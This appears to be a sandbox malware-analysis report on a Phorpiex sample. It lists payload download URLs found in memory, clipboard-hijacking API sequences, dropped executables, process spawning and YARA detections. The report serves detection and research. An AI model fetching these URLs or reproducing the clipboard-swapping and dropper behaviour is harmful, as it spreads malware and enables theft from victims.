                          Source: sysmablsvr.exe, 00000001.00000002.4234761224.0000000000870000.00000004.00000020.00020000.00000000.sdmp, 158752420.exe, 158752420.exe, 00000006.00000000.2344615892.00000000006E3000.00000002.00000001.01000000.00000007.sdmp, 158752420.exe, 00000006.00000002.2367197726.00000000006E3000.00000002.00000001.01000000.00000007.sdmp, 259428477.exe, 259428477.exe, 00000009.00000002.3131562220.0000000000A33000.00000002.00000001.01000000.00000009.sdmp, 259428477.exe, 00000009.00000000.3111017919.0000000000A33000.00000002.00000001.01000000.00000009.sdmp, 2958729589.exe, 2958729589.exe, 0000000A.00000002.3841753530.00000000003D3000.00000002.00000001.01000000.0000000A.sdmp, 2958729589.exe, 0000000A.00000000.3820554177.00000000003D3000.00000002.00000001.01000000.0000000A.sdmp, 2958729589.exe.1.dr, 259428477.exe.1.dr, 158752420.exe.1.drString found in binary or memory: http://91.202.233.141/lksrv.exe
                          Source: sysmablsvr.exe.0.drString found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
                          Source: sysmablsvr.exe.0.drString found in binary or memory: http://schemas.xmlsoap.org/soap/envelope/
                          Source: sysmablsvr.exe, 00000001.00000002.4234761224.0000000000870000.00000004.00000020.00020000.00000000.sdmp, 158752420.exe, 00000006.00000000.2344615892.00000000006E3000.00000002.00000001.01000000.00000007.sdmp, 158752420.exe, 00000006.00000002.2367197726.00000000006E3000.00000002.00000001.01000000.00000007.sdmp, 259428477.exe, 00000009.00000002.3131562220.0000000000A33000.00000002.00000001.01000000.00000009.sdmp, 259428477.exe, 00000009.00000000.3111017919.0000000000A33000.00000002.00000001.01000000.00000009.sdmp, 2958729589.exe, 0000000A.00000002.3841753530.00000000003D3000.00000002.00000001.01000000.0000000A.sdmp, 2958729589.exe, 0000000A.00000000.3820554177.00000000003D3000.00000002.00000001.01000000.0000000A.sdmp, 2958729589.exe.1.dr, 259428477.exe.1.dr, 158752420.exe.1.drString found in binary or memory: http://twizt.net/chnlk1.exe
                          Source: sysmablsvr.exe, 00000001.00000002.4234761224.0000000000870000.00000004.00000020.00020000.00000000.sdmp, 158752420.exe, 00000006.00000000.2344615892.00000000006E3000.00000002.00000001.01000000.00000007.sdmp, 158752420.exe, 00000006.00000002.2367197726.00000000006E3000.00000002.00000001.01000000.00000007.sdmp, 259428477.exe, 00000009.00000002.3131562220.0000000000A33000.00000002.00000001.01000000.00000009.sdmp, 259428477.exe, 00000009.00000000.3111017919.0000000000A33000.00000002.00000001.01000000.00000009.sdmp, 2958729589.exe, 0000000A.00000002.3841753530.00000000003D3000.00000002.00000001.01000000.0000000A.sdmp, 2958729589.exe, 0000000A.00000000.3820554177.00000000003D3000.00000002.00000001.01000000.0000000A.sdmp, 2958729589.exe.1.dr, 259428477.exe.1.dr, 158752420.exe.1.drString found in binary or memory: http://twizt.net/chnlk10.exe
                          Source: sysmablsvr.exe, 00000001.00000002.4234761224.0000000000870000.00000004.00000020.00020000.00000000.sdmp, 158752420.exe, 00000006.00000000.2344615892.00000000006E3000.00000002.00000001.01000000.00000007.sdmp, 158752420.exe, 00000006.00000002.2367197726.00000000006E3000.00000002.00000001.01000000.00000007.sdmp, 259428477.exe, 00000009.00000002.3131562220.0000000000A33000.00000002.00000001.01000000.00000009.sdmp, 259428477.exe, 00000009.00000000.3111017919.0000000000A33000.00000002.00000001.01000000.00000009.sdmp, 2958729589.exe, 0000000A.00000002.3841753530.00000000003D3000.00000002.00000001.01000000.0000000A.sdmp, 2958729589.exe, 0000000A.00000000.3820554177.00000000003D3000.00000002.00000001.01000000.0000000A.sdmp, 2958729589.exe.1.dr, 259428477.exe.1.dr, 158752420.exe.1.drString found in binary or memory: http://twizt.net/chnlk11.exe
                          Source: sysmablsvr.exe, 00000001.00000002.4234761224.0000000000870000.00000004.00000020.00020000.00000000.sdmp, 158752420.exe, 00000006.00000000.2344615892.00000000006E3000.00000002.00000001.01000000.00000007.sdmp, 158752420.exe, 00000006.00000002.2367197726.00000000006E3000.00000002.00000001.01000000.00000007.sdmp, 259428477.exe, 00000009.00000002.3131562220.0000000000A33000.00000002.00000001.01000000.00000009.sdmp, 259428477.exe, 00000009.00000000.3111017919.0000000000A33000.00000002.00000001.01000000.00000009.sdmp, 2958729589.exe, 0000000A.00000002.3841753530.00000000003D3000.00000002.00000001.01000000.0000000A.sdmp, 2958729589.exe, 0000000A.00000000.3820554177.00000000003D3000.00000002.00000001.01000000.0000000A.sdmp, 2958729589.exe.1.dr, 259428477.exe.1.dr, 158752420.exe.1.drString found in binary or memory: http://twizt.net/chnlk12.exe
                          Source: sysmablsvr.exe, 00000001.00000002.4234761224.0000000000870000.00000004.00000020.00020000.00000000.sdmp, 158752420.exe, 00000006.00000000.2344615892.00000000006E3000.00000002.00000001.01000000.00000007.sdmp, 158752420.exe, 00000006.00000002.2367197726.00000000006E3000.00000002.00000001.01000000.00000007.sdmp, 259428477.exe, 00000009.00000002.3131562220.0000000000A33000.00000002.00000001.01000000.00000009.sdmp, 259428477.exe, 00000009.00000000.3111017919.0000000000A33000.00000002.00000001.01000000.00000009.sdmp, 2958729589.exe, 0000000A.00000002.3841753530.00000000003D3000.00000002.00000001.01000000.0000000A.sdmp, 2958729589.exe, 0000000A.00000000.3820554177.00000000003D3000.00000002.00000001.01000000.0000000A.sdmp, 2958729589.exe.1.dr, 259428477.exe.1.dr, 158752420.exe.1.drString found in binary or memory: http://twizt.net/chnlk13.exe
                          Source: sysmablsvr.exe, 00000001.00000002.4234761224.0000000000870000.00000004.00000020.00020000.00000000.sdmp, 158752420.exe, 00000006.00000000.2344615892.00000000006E3000.00000002.00000001.01000000.00000007.sdmp, 158752420.exe, 00000006.00000002.2367197726.00000000006E3000.00000002.00000001.01000000.00000007.sdmp, 259428477.exe, 00000009.00000002.3131562220.0000000000A33000.00000002.00000001.01000000.00000009.sdmp, 259428477.exe, 00000009.00000000.3111017919.0000000000A33000.00000002.00000001.01000000.00000009.sdmp, 2958729589.exe, 0000000A.00000002.3841753530.00000000003D3000.00000002.00000001.01000000.0000000A.sdmp, 2958729589.exe, 0000000A.00000000.3820554177.00000000003D3000.00000002.00000001.01000000.0000000A.sdmp, 2958729589.exe.1.dr, 259428477.exe.1.dr, 158752420.exe.1.drString found in binary or memory: http://twizt.net/chnlk14.exe
                          Source: sysmablsvr.exe, 00000001.00000002.4234761224.0000000000870000.00000004.00000020.00020000.00000000.sdmp, 158752420.exe, 00000006.00000000.2344615892.00000000006E3000.00000002.00000001.01000000.00000007.sdmp, 158752420.exe, 00000006.00000002.2367197726.00000000006E3000.00000002.00000001.01000000.00000007.sdmp, 259428477.exe, 00000009.00000002.3131562220.0000000000A33000.00000002.00000001.01000000.00000009.sdmp, 259428477.exe, 00000009.00000000.3111017919.0000000000A33000.00000002.00000001.01000000.00000009.sdmp, 2958729589.exe, 0000000A.00000002.3841753530.00000000003D3000.00000002.00000001.01000000.0000000A.sdmp, 2958729589.exe, 0000000A.00000000.3820554177.00000000003D3000.00000002.00000001.01000000.0000000A.sdmp, 2958729589.exe.1.dr, 259428477.exe.1.dr, 158752420.exe.1.drString found in binary or memory: http://twizt.net/chnlk15.exe
                          Source: sysmablsvr.exe, 00000001.00000002.4234761224.0000000000870000.00000004.00000020.00020000.00000000.sdmp, 158752420.exe, 00000006.00000000.2344615892.00000000006E3000.00000002.00000001.01000000.00000007.sdmp, 158752420.exe, 00000006.00000002.2367197726.00000000006E3000.00000002.00000001.01000000.00000007.sdmp, 259428477.exe, 00000009.00000002.3131562220.0000000000A33000.00000002.00000001.01000000.00000009.sdmp, 259428477.exe, 00000009.00000000.3111017919.0000000000A33000.00000002.00000001.01000000.00000009.sdmp, 2958729589.exe, 0000000A.00000002.3841753530.00000000003D3000.00000002.00000001.01000000.0000000A.sdmp, 2958729589.exe, 0000000A.00000000.3820554177.00000000003D3000.00000002.00000001.01000000.0000000A.sdmp, 2958729589.exe.1.dr, 259428477.exe.1.dr, 158752420.exe.1.drString found in binary or memory: http://twizt.net/chnlk16.exe
                          Source: sysmablsvr.exe, 00000001.00000002.4234761224.0000000000870000.00000004.00000020.00020000.00000000.sdmp, 158752420.exe, 00000006.00000000.2344615892.00000000006E3000.00000002.00000001.01000000.00000007.sdmp, 158752420.exe, 00000006.00000002.2367197726.00000000006E3000.00000002.00000001.01000000.00000007.sdmp, 259428477.exe, 00000009.00000002.3131562220.0000000000A33000.00000002.00000001.01000000.00000009.sdmp, 259428477.exe, 00000009.00000000.3111017919.0000000000A33000.00000002.00000001.01000000.00000009.sdmp, 2958729589.exe, 0000000A.00000002.3841753530.00000000003D3000.00000002.00000001.01000000.0000000A.sdmp, 2958729589.exe, 0000000A.00000000.3820554177.00000000003D3000.00000002.00000001.01000000.0000000A.sdmp, 2958729589.exe.1.dr, 259428477.exe.1.dr, 158752420.exe.1.drString found in binary or memory: http://twizt.net/chnlk17.exe
                          Source: sysmablsvr.exe, 00000001.00000002.4234761224.0000000000870000.00000004.00000020.00020000.00000000.sdmp, 158752420.exe, 00000006.00000000.2344615892.00000000006E3000.00000002.00000001.01000000.00000007.sdmp, 158752420.exe, 00000006.00000002.2367197726.00000000006E3000.00000002.00000001.01000000.00000007.sdmp, 259428477.exe, 00000009.00000002.3131562220.0000000000A33000.00000002.00000001.01000000.00000009.sdmp, 259428477.exe, 00000009.00000000.3111017919.0000000000A33000.00000002.00000001.01000000.00000009.sdmp, 2958729589.exe, 0000000A.00000002.3841753530.00000000003D3000.00000002.00000001.01000000.0000000A.sdmp, 2958729589.exe, 0000000A.00000000.3820554177.00000000003D3000.00000002.00000001.01000000.0000000A.sdmp, 2958729589.exe.1.dr, 259428477.exe.1.dr, 158752420.exe.1.drString found in binary or memory: http://twizt.net/chnlk18.exe
                          Source: sysmablsvr.exe, 00000001.00000002.4234761224.0000000000870000.00000004.00000020.00020000.00000000.sdmp, 158752420.exe, 00000006.00000000.2344615892.00000000006E3000.00000002.00000001.01000000.00000007.sdmp, 158752420.exe, 00000006.00000002.2367197726.00000000006E3000.00000002.00000001.01000000.00000007.sdmp, 259428477.exe, 00000009.00000002.3131562220.0000000000A33000.00000002.00000001.01000000.00000009.sdmp, 259428477.exe, 00000009.00000000.3111017919.0000000000A33000.00000002.00000001.01000000.00000009.sdmp, 2958729589.exe, 0000000A.00000002.3841753530.00000000003D3000.00000002.00000001.01000000.0000000A.sdmp, 2958729589.exe, 0000000A.00000000.3820554177.00000000003D3000.00000002.00000001.01000000.0000000A.sdmp, 2958729589.exe.1.dr, 259428477.exe.1.dr, 158752420.exe.1.drString found in binary or memory: http://twizt.net/chnlk19.exe
                          Source: sysmablsvr.exe, 00000001.00000002.4234761224.0000000000870000.00000004.00000020.00020000.00000000.sdmp, 158752420.exe, 00000006.00000000.2344615892.00000000006E3000.00000002.00000001.01000000.00000007.sdmp, 158752420.exe, 00000006.00000002.2367197726.00000000006E3000.00000002.00000001.01000000.00000007.sdmp, 259428477.exe, 00000009.00000002.3131562220.0000000000A33000.00000002.00000001.01000000.00000009.sdmp, 259428477.exe, 00000009.00000000.3111017919.0000000000A33000.00000002.00000001.01000000.00000009.sdmp, 2958729589.exe, 0000000A.00000002.3841753530.00000000003D3000.00000002.00000001.01000000.0000000A.sdmp, 2958729589.exe, 0000000A.00000000.3820554177.00000000003D3000.00000002.00000001.01000000.0000000A.sdmp, 2958729589.exe.1.dr, 259428477.exe.1.dr, 158752420.exe.1.drString found in binary or memory: http://twizt.net/chnlk2.exe
                          Source: sysmablsvr.exe, 00000001.00000002.4234761224.0000000000870000.00000004.00000020.00020000.00000000.sdmp, 158752420.exe, 00000006.00000000.2344615892.00000000006E3000.00000002.00000001.01000000.00000007.sdmp, 158752420.exe, 00000006.00000002.2367197726.00000000006E3000.00000002.00000001.01000000.00000007.sdmp, 259428477.exe, 00000009.00000002.3131562220.0000000000A33000.00000002.00000001.01000000.00000009.sdmp, 259428477.exe, 00000009.00000000.3111017919.0000000000A33000.00000002.00000001.01000000.00000009.sdmp, 2958729589.exe, 0000000A.00000002.3841753530.00000000003D3000.00000002.00000001.01000000.0000000A.sdmp, 2958729589.exe, 0000000A.00000000.3820554177.00000000003D3000.00000002.00000001.01000000.0000000A.sdmp, 2958729589.exe.1.dr, 259428477.exe.1.dr, 158752420.exe.1.drString found in binary or memory: http://twizt.net/chnlk20.exe
                          Source: sysmablsvr.exe, 00000001.00000002.4234761224.0000000000870000.00000004.00000020.00020000.00000000.sdmp, 158752420.exe, 00000006.00000000.2344615892.00000000006E3000.00000002.00000001.01000000.00000007.sdmp, 158752420.exe, 00000006.00000002.2367197726.00000000006E3000.00000002.00000001.01000000.00000007.sdmp, 259428477.exe, 00000009.00000002.3131562220.0000000000A33000.00000002.00000001.01000000.00000009.sdmp, 259428477.exe, 00000009.00000000.3111017919.0000000000A33000.00000002.00000001.01000000.00000009.sdmp, 2958729589.exe, 0000000A.00000002.3841753530.00000000003D3000.00000002.00000001.01000000.0000000A.sdmp, 2958729589.exe, 0000000A.00000000.3820554177.00000000003D3000.00000002.00000001.01000000.0000000A.sdmp, 2958729589.exe.1.dr, 259428477.exe.1.dr, 158752420.exe.1.drString found in binary or memory: http://twizt.net/chnlk3.exe
                          Source: sysmablsvr.exe, 00000001.00000002.4234761224.0000000000870000.00000004.00000020.00020000.00000000.sdmp, 158752420.exe, 00000006.00000000.2344615892.00000000006E3000.00000002.00000001.01000000.00000007.sdmp, 158752420.exe, 00000006.00000002.2367197726.00000000006E3000.00000002.00000001.01000000.00000007.sdmp, 259428477.exe, 00000009.00000002.3131562220.0000000000A33000.00000002.00000001.01000000.00000009.sdmp, 259428477.exe, 00000009.00000000.3111017919.0000000000A33000.00000002.00000001.01000000.00000009.sdmp, 2958729589.exe, 0000000A.00000002.3841753530.00000000003D3000.00000002.00000001.01000000.0000000A.sdmp, 2958729589.exe, 0000000A.00000000.3820554177.00000000003D3000.00000002.00000001.01000000.0000000A.sdmp, 2958729589.exe.1.dr, 259428477.exe.1.dr, 158752420.exe.1.drString found in binary or memory: http://twizt.net/chnlk4.exe
                          Source: sysmablsvr.exe, 00000001.00000002.4234761224.0000000000870000.00000004.00000020.00020000.00000000.sdmp, 158752420.exe, 00000006.00000000.2344615892.00000000006E3000.00000002.00000001.01000000.00000007.sdmp, 158752420.exe, 00000006.00000002.2367197726.00000000006E3000.00000002.00000001.01000000.00000007.sdmp, 259428477.exe, 00000009.00000002.3131562220.0000000000A33000.00000002.00000001.01000000.00000009.sdmp, 259428477.exe, 00000009.00000000.3111017919.0000000000A33000.00000002.00000001.01000000.00000009.sdmp, 2958729589.exe, 0000000A.00000002.3841753530.00000000003D3000.00000002.00000001.01000000.0000000A.sdmp, 2958729589.exe, 0000000A.00000000.3820554177.00000000003D3000.00000002.00000001.01000000.0000000A.sdmp, 2958729589.exe.1.dr, 259428477.exe.1.dr, 158752420.exe.1.drString found in binary or memory: http://twizt.net/chnlk5.exe
                          Source: sysmablsvr.exe, 00000001.00000002.4234761224.0000000000870000.00000004.00000020.00020000.00000000.sdmp, 158752420.exe, 00000006.00000000.2344615892.00000000006E3000.00000002.00000001.01000000.00000007.sdmp, 158752420.exe, 00000006.00000002.2367197726.00000000006E3000.00000002.00000001.01000000.00000007.sdmp, 259428477.exe, 00000009.00000002.3131562220.0000000000A33000.00000002.00000001.01000000.00000009.sdmp, 259428477.exe, 00000009.00000000.3111017919.0000000000A33000.00000002.00000001.01000000.00000009.sdmp, 2958729589.exe, 0000000A.00000002.3841753530.00000000003D3000.00000002.00000001.01000000.0000000A.sdmp, 2958729589.exe, 0000000A.00000000.3820554177.00000000003D3000.00000002.00000001.01000000.0000000A.sdmp, 2958729589.exe.1.dr, 259428477.exe.1.dr, 158752420.exe.1.drString found in binary or memory: http://twizt.net/chnlk6.exe
                          Source: sysmablsvr.exe, 00000001.00000002.4234761224.0000000000870000.00000004.00000020.00020000.00000000.sdmp, 158752420.exe, 00000006.00000000.2344615892.00000000006E3000.00000002.00000001.01000000.00000007.sdmp, 158752420.exe, 00000006.00000002.2367197726.00000000006E3000.00000002.00000001.01000000.00000007.sdmp, 259428477.exe, 00000009.00000002.3131562220.0000000000A33000.00000002.00000001.01000000.00000009.sdmp, 259428477.exe, 00000009.00000000.3111017919.0000000000A33000.00000002.00000001.01000000.00000009.sdmp, 2958729589.exe, 0000000A.00000002.3841753530.00000000003D3000.00000002.00000001.01000000.0000000A.sdmp, 2958729589.exe, 0000000A.00000000.3820554177.00000000003D3000.00000002.00000001.01000000.0000000A.sdmp, 2958729589.exe.1.dr, 259428477.exe.1.dr, 158752420.exe.1.drString found in binary or memory: http://twizt.net/chnlk7.exe
                          Source: sysmablsvr.exe, 00000001.00000002.4234761224.0000000000870000.00000004.00000020.00020000.00000000.sdmp, 158752420.exe, 00000006.00000000.2344615892.00000000006E3000.00000002.00000001.01000000.00000007.sdmp, 158752420.exe, 00000006.00000002.2367197726.00000000006E3000.00000002.00000001.01000000.00000007.sdmp, 259428477.exe, 00000009.00000002.3131562220.0000000000A33000.00000002.00000001.01000000.00000009.sdmp, 259428477.exe, 00000009.00000000.3111017919.0000000000A33000.00000002.00000001.01000000.00000009.sdmp, 2958729589.exe, 0000000A.00000002.3841753530.00000000003D3000.00000002.00000001.01000000.0000000A.sdmp, 2958729589.exe, 0000000A.00000000.3820554177.00000000003D3000.00000002.00000001.01000000.0000000A.sdmp, 2958729589.exe.1.dr, 259428477.exe.1.dr, 158752420.exe.1.drString found in binary or memory: http://twizt.net/chnlk8.exe
                          Source: sysmablsvr.exe, 00000001.00000002.4234761224.0000000000870000.00000004.00000020.00020000.00000000.sdmp, 158752420.exe, 00000006.00000000.2344615892.00000000006E3000.00000002.00000001.01000000.00000007.sdmp, 158752420.exe, 00000006.00000002.2367197726.00000000006E3000.00000002.00000001.01000000.00000007.sdmp, 259428477.exe, 00000009.00000002.3131562220.0000000000A33000.00000002.00000001.01000000.00000009.sdmp, 259428477.exe, 00000009.00000000.3111017919.0000000000A33000.00000002.00000001.01000000.00000009.sdmp, 2958729589.exe, 0000000A.00000002.3841753530.00000000003D3000.00000002.00000001.01000000.0000000A.sdmp, 2958729589.exe, 0000000A.00000000.3820554177.00000000003D3000.00000002.00000001.01000000.0000000A.sdmp, 2958729589.exe.1.dr, 259428477.exe.1.dr, 158752420.exe.1.drString found in binary or memory: http://twizt.net/chnlk9.exe
                          Source: sysmablsvr.exe, 00000001.00000002.4234405265.00000000006C4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.comicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe?ms-resource://microsoft.wi
                          Source: C:\Users\user\Desktop\file.exeCode function: 0_2_004048A0 lstrlenW,StrStrW,StrStrW,StrStrW,StrStrW,StrStrW,StrStrW,isalpha,isdigit,StrStrW,StrStrW,StrStrW,StrStrW,StrStrW,StrStrW,StrStrW,StrStrW,lstrlenA,GlobalAlloc,GlobalLock,memcpy,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,0_2_004048A0
                          Source: C:\Users\user\Desktop\file.exeCode function: 0_2_004048A0 lstrlenW,StrStrW,StrStrW,StrStrW,StrStrW,StrStrW,StrStrW,isalpha,isdigit,StrStrW,StrStrW,StrStrW,StrStrW,StrStrW,StrStrW,StrStrW,StrStrW,lstrlenA,GlobalAlloc,GlobalLock,memcpy,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,0_2_004048A0
                          Source: C:\Windows\sysmablsvr.exeCode function: 1_2_004048A0 lstrlenW,StrStrW,StrStrW,StrStrW,StrStrW,StrStrW,StrStrW,isalpha,isdigit,StrStrW,StrStrW,StrStrW,StrStrW,StrStrW,StrStrW,StrStrW,StrStrW,lstrlenA,GlobalAlloc,GlobalLock,memcpy,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,1_2_004048A0
                          Source: C:\Windows\sysmablsvr.exeCode function: 2_2_004048A0 lstrlenW,StrStrW,StrStrW,StrStrW,StrStrW,StrStrW,StrStrW,isalpha,isdigit,StrStrW,StrStrW,StrStrW,StrStrW,StrStrW,StrStrW,StrStrW,StrStrW,lstrlenA,GlobalAlloc,GlobalLock,memcpy,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,2_2_004048A0
                          Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00405910 GetWindowLongW,SetClipboardViewer,SetWindowLongW,SetWindowLongW,SendMessageA,IsClipboardFormatAvailable,IsClipboardFormatAvailable,IsClipboardFormatAvailable,OpenClipboard,GetClipboardData,GlobalLock,GlobalUnlock,CloseClipboard,SendMessageA,RegisterRawInputDevices,ChangeClipboardChain,DefWindowProcA,0_2_00405910
                          Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00405910 GetWindowLongW,SetClipboardViewer,SetWindowLongW,SetWindowLongW,SendMessageA,IsClipboardFormatAvailable,IsClipboardFormatAvailable,IsClipboardFormatAvailable,OpenClipboard,GetClipboardData,GlobalLock,GlobalUnlock,CloseClipboard,SendMessageA,RegisterRawInputDevices,ChangeClipboardChain,DefWindowProcA,0_2_00405910

                          Spam, unwanted Advertisements and Ransom Demands

                          barindex
                          Yara detected Phorpiex
                          Source: Yara matchFile source: file.exe, type: SAMPLE
                          Source: Yara matchFile source: 2.0.sysmablsvr.exe.400000.0.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 1.2.sysmablsvr.exe.400000.0.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 0.2.file.exe.400000.0.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 2.2.sysmablsvr.exe.400000.0.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 0.0.file.exe.400000.0.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 1.0.sysmablsvr.exe.400000.0.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 00000001.00000000.1804968685.0000000000410000.00000002.00000001.01000000.00000004.sdmp, type: MEMORY
                          Source: Yara matchFile source: 00000000.00000000.1784055994.0000000000410000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
                          Source: Yara matchFile source: 00000002.00000000.1909749196.0000000000410000.00000002.00000001.01000000.00000004.sdmp, type: MEMORY
                          Source: Yara matchFile source: 00000002.00000002.1933493445.0000000000410000.00000002.00000001.01000000.00000004.sdmp, type: MEMORY
                          Source: Yara matchFile source: 00000001.00000002.4234049042.0000000000410000.00000002.00000001.01000000.00000004.sdmp, type: MEMORY
                          Source: Yara matchFile source: 00000000.00000002.1815284495.0000000000410000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
                          Source: Yara matchFile source: 00000000.00000003.1805000272.0000000000547000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                          Source: Yara matchFile source: Process Memory Space: file.exe PID: 6672, type: MEMORYSTR
                          Source: Yara matchFile source: Process Memory Space: sysmablsvr.exe PID: 6768, type: MEMORYSTR
                          Source: Yara matchFile source: Process Memory Space: sysmablsvr.exe PID: 2148, type: MEMORYSTR
                          Source: Yara matchFile source: C:\Windows\sysmablsvr.exe, type: DROPPED
                          Source: C:\Windows\sysmablsvr.exeProcess Stats: CPU usage > 49%
                          Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0040F669 NtQueryVirtualMemory,0_2_0040F669
                          Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0040DA30 NtQuerySystemTime,RtlTimeToSecondsSince1980,0_2_0040DA30
                          Source: C:\Windows\sysmablsvr.exeCode function: 1_2_0040F669 NtQueryVirtualMemory,1_2_0040F669
                          Source: C:\Windows\sysmablsvr.exeCode function: 1_2_0040DA30 NtQuerySystemTime,RtlTimeToSecondsSince1980,1_2_0040DA30
                          Source: C:\Windows\sysmablsvr.exeCode function: 2_2_0040F669 NtQueryVirtualMemory,2_2_0040F669
                          Source: C:\Windows\sysmablsvr.exeCode function: 2_2_0040DA30 NtQuerySystemTime,RtlTimeToSecondsSince1980,2_2_0040DA30
                          Source: C:\Users\user\Desktop\file.exeFile created: C:\Windows\sysmablsvr.exeJump to behavior
                          Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0040F42C0_2_0040F42C
                          Source: C:\Users\user\Desktop\file.exeCode function: 0_2_004080D90_2_004080D9
                          Source: C:\Users\user\Desktop\file.exeCode function: 0_2_004040900_2_00404090
                          Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0040AA900_2_0040AA90
                          Source: C:\Users\user\Desktop\file.exeCode function: 0_2_004048A00_2_004048A0
                          Source: C:\Users\user\Desktop\file.exeCode function: 0_2_004080B00_2_004080B0
                          Source: C:\Windows\sysmablsvr.exeCode function: 1_2_0040F42C1_2_0040F42C
                          Source: C:\Windows\sysmablsvr.exeCode function: 1_2_004080D91_2_004080D9
                          Source: C:\Windows\sysmablsvr.exeCode function: 1_2_004040901_2_00404090
                          Source: C:\Windows\sysmablsvr.exeCode function: 1_2_0040AA901_2_0040AA90
                          Source: C:\Windows\sysmablsvr.exeCode function: 1_2_004048A01_2_004048A0
                          Source: C:\Windows\sysmablsvr.exeCode function: 1_2_004080B01_2_004080B0
                          Source: C:\Windows\sysmablsvr.exeCode function: 2_2_0040F42C2_2_0040F42C
                          Source: C:\Windows\sysmablsvr.exeCode function: 2_2_004080D92_2_004080D9
                          Source: C:\Windows\sysmablsvr.exeCode function: 2_2_004040902_2_00404090
                          Source: C:\Windows\sysmablsvr.exeCode function: 2_2_0040AA902_2_0040AA90
                          Source: C:\Windows\sysmablsvr.exeCode function: 2_2_004048A02_2_004048A0
                          Source: C:\Windows\sysmablsvr.exeCode function: 2_2_004080B02_2_004080B0
                          Source: Joe Sandbox ViewDropped File: C:\Users\user\AppData\Local\Temp\524024912.exe E97496328C0D205A7ECB4ADE75C1555FC7787EC54334468739C5C5CFD6566B3C
                          Source: Joe Sandbox ViewDropped File: C:\Windows\sysmablsvr.exe A992920E64A64763F3DD8C2A431A0F5E56E5B3782A1496DE92BC80EE71CCA5BA
                          Source: file.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
                          Source: classification engineClassification label: mal100.troj.evad.winEXE@12/17@0/87
                          Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00406B50 Sleep,GetModuleFileNameW,GetVolumeInformationW,GetDiskFreeSpaceExW,_aulldiv,wsprintfW,wsprintfW,wsprintfW,Sleep,ExitThread,0_2_00406B50
                          Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0040E040 SysAllocString,CoCreateInstance,SysFreeString,0_2_0040E040
                          Source: C:\Windows\sysmablsvr.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\1[1]Jump to behavior
                          Source: C:\Windows\sysmablsvr.exeMutant created: \Sessions\1\BaseNamedObjects\55a4er5wo
                          Source: C:\Windows\sysmablsvr.exeFile created: C:\Users\user\AppData\Local\Temp\21548511.exeJump to behavior
                          Source: file.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                          Source: C:\Users\user\Desktop\file.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                          Source: file.exeReversingLabs: Detection: 84%
                          Source: C:\Users\user\Desktop\file.exeFile read: C:\Users\user\Desktop\file.exeJump to behavior
                          Source: unknownProcess created: C:\Users\user\Desktop\file.exe "C:\Users\user\Desktop\file.exe"
                          Source: C:\Users\user\Desktop\file.exeProcess created: C:\Windows\sysmablsvr.exe C:\Windows\sysmablsvr.exe
                          Source: unknownProcess created: C:\Windows\sysmablsvr.exe "C:\Windows\sysmablsvr.exe"
                          Source: C:\Windows\sysmablsvr.exeProcess created: C:\Users\user\AppData\Local\Temp\158752420.exe C:\Users\user\AppData\Local\Temp\158752420.exe
                          Source: C:\Windows\sysmablsvr.exeProcess created: C:\Users\user\AppData\Local\Temp\524024912.exe C:\Users\user\AppData\Local\Temp\524024912.exe
                          Source: C:\Windows\sysmablsvr.exeProcess created: C:\Users\user\AppData\Local\Temp\259428477.exe C:\Users\user\AppData\Local\Temp\259428477.exe
                          Source: C:\Windows\sysmablsvr.exeProcess created: C:\Users\user\AppData\Local\Temp\2958729589.exe C:\Users\user\AppData\Local\Temp\2958729589.exe
                          Source: C:\Users\user\Desktop\file.exeProcess created: C:\Windows\sysmablsvr.exe C:\Windows\sysmablsvr.exeJump to behavior
                          Source: C:\Windows\sysmablsvr.exeProcess created: C:\Users\user\AppData\Local\Temp\158752420.exe C:\Users\user\AppData\Local\Temp\158752420.exeJump to behavior
                          Source: C:\Windows\sysmablsvr.exeProcess created: C:\Users\user\AppData\Local\Temp\524024912.exe C:\Users\user\AppData\Local\Temp\524024912.exeJump to behavior
                          Source: C:\Windows\sysmablsvr.exeProcess created: C:\Users\user\AppData\Local\Temp\259428477.exe C:\Users\user\AppData\Local\Temp\259428477.exeJump to behavior
                          Source: C:\Windows\sysmablsvr.exeProcess created: C:\Users\user\AppData\Local\Temp\2958729589.exe C:\Users\user\AppData\Local\Temp\2958729589.exeJump to behavior
                          Source: C:\Users\user\Desktop\file.exeSection loaded: apphelp.dllJump to behavior
                          Source: C:\Users\user\Desktop\file.exeSection loaded: urlmon.dllJump to behavior
                          Source: C:\Users\user\Desktop\file.exeSection loaded: wininet.dllJump to behavior
                          Source: C:\Users\user\Desktop\file.exeSection loaded: iertutil.dllJump to behavior
                          Source: C:\Users\user\Desktop\file.exeSection loaded: srvcli.dllJump to behavior
                          Source: C:\Users\user\Desktop\file.exeSection loaded: netutils.dllJump to behavior
                          Source: C:\Users\user\Desktop\file.exeSection loaded: ntmarta.dllJump to behavior
